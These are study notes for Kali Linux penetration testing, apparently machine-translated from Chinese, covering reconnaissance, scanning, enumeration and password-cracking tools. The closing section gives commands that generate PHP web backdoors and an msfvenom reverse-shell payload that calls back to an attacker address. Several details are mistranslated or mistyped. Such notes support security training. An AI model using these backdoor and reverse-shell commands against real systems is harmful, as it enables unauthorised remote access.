kali-linux knowledge sorting and penetration testing guide

Kali Linux Introduction and Introduction

1. Main features of kali

Kali official website: https://www.kali.org/
Debian-based Linux distribution

Integrate more than 300 penetration test procedures

Support most wireless network cards

2. Network service configuration

1. Set fixed IP:

Virtual machine network settings file

/etc/network/interfaces

2. Temporary ip configuration command

ifconfig eth0 192.168.43.100 netmask 255.255.255.0					//ip
route add default gw 192.168.43.1									//网关路由
systemctl restart networking.service								//重启网络恢复

3. The role of the dmesg command:

View wireless network card hardware information, view kernel ring buffer information

4. Commands to turn the network on and off

You can use the systemctl or service commands here. The syntax is basically the same. The old version of kali may only support the service command.
Common syntaxes are:

start			//开启
stop			//关闭
restart			//重启

5. Commonly used services in kali

http(apache)

service apache2 start // Start
service apache2 stop // Close
service apache2 restart // Restart
update-rc.d apache2 defaults // Self-start

mysql

service mysql start // Start
service mysql stop // Close
service mysql restart // Restart
update-rc.d mysql defaults // Since starting
mysql -u root -p // Login

ssh

service ssh start // Start
service ssh stop // Close
service ssh restart // Restart
update-rc.d ssh defaults // Self-start

3. System update

command

apt-get update
apt-get upgrate
apt-get dist-upgrade

PS: The latest version of the Kali, which is the 2020 version, is not very compatible, and many of my commonly used tools have been removed. Personally, I do not recommend updating, except for needs.

aptcache search <包名>			//在软件仓库查找某个软件包的名称
apt-get install <包名>			//指定安装某个软件

Penetration testing overview

1. Methodology of five test frameworks

开源安全测试方法论

信息系统安全评估框架

开放式web应用安全项目

web应用安全联合威胁人类

渗透测试执行标准

Second, the universal penetration testing framework

范围界定

信息收集

目标识别

服务枚举

漏洞映射

社会工程学

漏洞利用

提升权限

访问维护

文档报告

Implementation steps of penetration testing

1. Information gathering

Definition, use and usage of whois command

whois example.com
This command will return detailed information about the domain name of the example.com domain name registrant and contact information.
Official website: https://who.is/

DNS record analysis

1. host

host www.example.com

Only return the ip address (ipv4) when there is no parameter

host -a www.example.com

Add parameter -a to return all dns records

2nd dig

dig example.com

When there is no parameter, only the A record address (IPV4) is returned

dig example.com any

Add parameter any to return all dns records

3. dnsenum

dnsenum example.com

By default, it will return the IP address information of the host address, name resolution server and mail server.
If you have a dictionary, you can use this tool to blast the subdomain
dnsenum -f dns.txt example.com

4. dmitry

dmitry -iwnse targethost

Perform whois query

Mining host information on Netcraft.com website

Search all possible subdomains

Search all possible email addresses

dmitry targethost -f -b

Do a simple port scan (very slow and not easy to use, not recommended)

Routing information

1. tcptraceroute

tcptraceroute example.com

It is known that the target web server has opened port 80 using the TCP protocol. Use the above command to obtain complete routing information from the local machine to the target host.

ps: easily blocked by firewall

2. tctrace

tctrace -i eth0 -d example.com

Specify the network card eth0 to obtain routing information between this machine and example.com

Target Recognition

Blog columns penetration testing tools commonly used - target recognition

1. ping

ping -c 10 example.com
ping -c 10 192.168.123.256

The -c parameter specifies the number of packets sent (execution times)

The -i parameter specifies the source address or network interface (network card)

-s specifies the packet size (default size is 64 bytes)

2. arping

arping 192.168.56.102 -c 1

Check whether the host in the LAN is online, -i parameter specifies the network card, -c parameter specifies the number of times

3. fping

fping 192.168.1.1 192.168.1.100 192.168.1.107

Check if the three hosts are online

fping -g 192.168.56.0/24

Detect the entire network segment

fping -r 1 -g 192.168.1.1 192.168.1.10

The parameter -r specifies the number of retries, the default is 3

fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net

-s parameter to view the statistical results of multiple targets

4. Hping3

The main purpose

Test firewall rules

Test intrusion detection system / IDS

Test security vulnerabilities in TCP / IP mode

hping3 -0 192.168.56.101  发送原始IP包（--raw-ip)
hping3 -1 192.168.56.101  发送ICMP包(--icmp)
hping3 -2 192.168.56.101  发送UDP包(--udp)
hping3 -8 192.168.56.101  进入扫描模式(--scan)
hping3 -9 192.168.56.101  进入监听模式(--listen)

5. nping

nping --tcp-connect -c 1 -p 22 192.168.56.102  基础的tcp-connect功能
nping --tcp -c 1 -p 22 192.168.6.102           TCP模式
nping --udp -c 1 -p 22 192.168.6.102           UDP模式
nping --icmp -c 1 -p 22 192.168.6.102          ICMP模式（默认模式）
nping --arp -c 1 -p 22 192.168.6.102           ARP/RARP模式
nping --tr -c 1 -p 22 192.168.6.102            traceroute模式

6. nbtscan

nbtscan 192.168.1.1-254

Search the NetBIOS name of each host in the LAN

nbtscan -hv 192.168.1.1-254

-hv parameter to see which services are running

7. uniscan

Operating system identification

1. p0f

Can identify the following hosts

The machine connected to your host (SYN mode, the default mode)

Machines accessible by the host (SYN + ACK mode)

Machines that the host cannot access (RST + mode)

Machines that can monitor their network communication

p0f -f /etc/p0f/p0f.fp -o p0f.log

Open port 80 for target machine access

2. nmap

nmap -O 192.168.43.89			//操作系统识别

Recognition rate is not very high

Service enumeration

Common tools for penetration testing-amap service enumeration

Network scan

1. nmap

The main function

Host detection

Port scan

Service / version detection

Operating system detection

Network routing

Nmap script engine

nmap -sT 192.168.43.89							//TCP连接扫描
nmap -sS 192.168.43.89							//SYN扫描
nmap -sN 192.168.43.89 							//TCP NULL扫描
nmap -sF 192.168.43.89  						//TCP FIN扫描
nmap -sX 192.168.43.89  						//TCP XMAS扫描
nmap -sM 192.168.43.89  						//TCP Maimon扫描
nmap -sA 192.168.43.89  						//TCP ACK扫描
nmap -sW 192.168.43.89  						//TCP 窗口扫描
nmap -sI 192.168.43.89  						//TCP Idel扫描 

Scan options

-p 端口范围 ：只扫描指定的端口
-F （快速扫描）：仅扫描100个常用端口
-r （顺序扫描）：按照从小到大的顺序扫描端口
--top-ports <1 or greater> 扫描nmap-services里排名前N的端口

Target port options

Interactive (screen) output
Normal output (-oN) does not display runtime information and warning information
XML file (-oX) The generated XML format file can be converted into an html file, and can also be parsed by the graphical user interface, which is easy to import into the database to
generate for Grep to use Files (-oG)

Output options

-T Specifies the time schedule control mode

Time schedule control options

nmap -sV 192.168.43.89 -p 22    				//服务版本识别
nmap -O  192.168.43.89          				//操作系统检测
nmap -Pn 192.168.43.89          				//禁用主机检测
nmap -A  192.168.43.89          				//综合扫描

Common options

-sC 或 --script = default         启动默认类NES脚本
--script <filename>|<category>|<directories>  根据指定的文件名、类别名、目录名，执行相应的脚本
--script-args<args>               给脚本指定参数

Script engine

-f 使用小数据包
--mtu 调整数据包的大小
-D    指定假IP
--source-port<portnumber>或-g  模拟源端口
--data-length 改变发送的数据包的默认长度
--max-parallelism  限制nmap并发扫描的最大连接数
--scan-delay<time>  控制发送探测数据的时间间隔

edit

2. Unicornscan

-m U detect UDP protocol
-m T detect TCP protocol

-Iv View detailed output

-r Adjust the packet sending rate

unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000

SMB enumeration

1. nbtscan

nbtscan 192.168.56.1-254

Search the NetBIOS name of each host in 192.168.56.0

nbtscan -hv 192.168.56.102

View the network service of this host 192.168.56.102

SNMP enumeration

A common tool for penetration testing-ADMsnmp for snmp analysis

1. onesixtyone

onesixtyone 192.168.56.102

SNMP string supported by search host

onesixtyone -d 192.168.56.102

Perform a more detailed scan

2. snmpcheck

snmpcheck -t 192.168.56.102

Collect information about SNMP devices

VPN enumeration

1. ike-scan

ike-scan -M -A -Pike-hashkey 192.168.0.10

Detect, identify, and test an IPSec VPN server

-M divides the decoding information of the payload into multiple lines for easy reading

-A use IKE's aggressive mode

-P Save the hash value of aggressive mode and shared key as a file

Vulnerability mapping

1. Types of vulnerabilities

Local vulnerability

Remote vulnerability

Second, the vulnerability scanner

OpenVAS

Cisco analysis tools

Cisco Auditing Tool（cat）

run:

 cd /usr/share/
 CAT --help

Commands:
-h specifies the host name (use this option when scanning a single host)
-w specifies the dictionary name (to guess the community string)
-a specifies the password list (to exhaust the password)
-i and [ioshist] (check the IOS Bugs that have appeared in history)

Cisco Global Exploiter （cge）

run:

 cd /usr/bin/
 cge.pl

command

cge.pl 10.200.213.25 3

The third type of test

WebCrack

FUZZ (fuzzy) analysis tool

BED (to be continued)

JBroFuzz ​​(to be continued)

3. SMB analysis tool

ImpacketSamrdump

(to be continued)

4. SNMP analysis tool

SNMP Walk

(to be continued)

5. Web program analysis tools

Database evaluation tools

DBPwAudit (to be continued)

sqlmap

SQL Ninja (to be continued)

Web Application Evaluation Tool

Burpsuite (to be continued)

nobody

Paros Proxy (to be continued)

W3af (to be continued)

WafW00f (to be continued)

Webscarab (to be continued)

Exploit

MSFConsole

MSFConsole_Commonly used modules

MSFConsole_Post-Infiltration Module

Elevation of authority

1. Classification

Vertical elevation

Horizontal Elevation of Rights

Second, the use of local vulnerabilities

3. Password attack

Based on knowledge

Based on all

Feature-based

Offline attack

Online attack

hash-idntifire judgment hash algorithm — Only use the hash algorithm used by the system under test to crack the password

Hashcat multi-thread password cracking, fully using CPU

RainbowCrack uses the rainbow table to crack and exchange space for time

samdump2 crack the password of the windows system account

John cracked the hash, and cracked the DES crypt type is excellent

Graphic version of Johnny John

Crunch creates a password dictionary that can be used for brute force cracking

Ophcrack LM / NTML type based on rainbow table

Online cracking tool

CeWL crawler mode is a tool to collect words on a specified URL, and put the collected words into a dictionary to improve the hit rate of blasting

Hydra crack password online

Medusa crack password online

4. Internet spoofing tools

Network sniffing and network spoofing

DNSchef

DNS reply to the tested host for the DNS server, resolve the domain name to the IP controlled by the attacker, so that the attacker's host plays the role of a real server

arpspoof

Practical tool for assisting network monitoring in switching network

Ettercap

Tools for man-in-the-middle attacks in LAN

Five, network sniffer

Dsniff

tcpdump

Wireshark

Access maintenance

First, the operating system back door

Cymothoa

Intersect

Meter preter

Second, the tunnel tool

dns2tcp

iodine

ncat

proxychains

ptunnel

shocked

sslh

stunnel4

Three, create a web backdoor

WeBaCoo

Command:
-g make backdoor code
-f php function required for backdoor: system (default) / shell_exec / exec / passthru / popen
-o output the file name of the specified backdoor program generated
Example:

webacoo -g -o test.php  使用默认配置生成php后门程序
webacoo -t -u http://192.168.43.89/test.php

Connect to backdoor

weevely

Generate obfuscated PHP backdoor and save the backdoor as display.php

weevely generate password display.php
weevely http://192.168.43.89/display.php password

Access the webshell of the host under test

PHP Meterpreter

-p specifies the payload as php / meterpreter / reverse_tcp

-f Set output format

lhost is the attacker address
lport is the attacker port

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php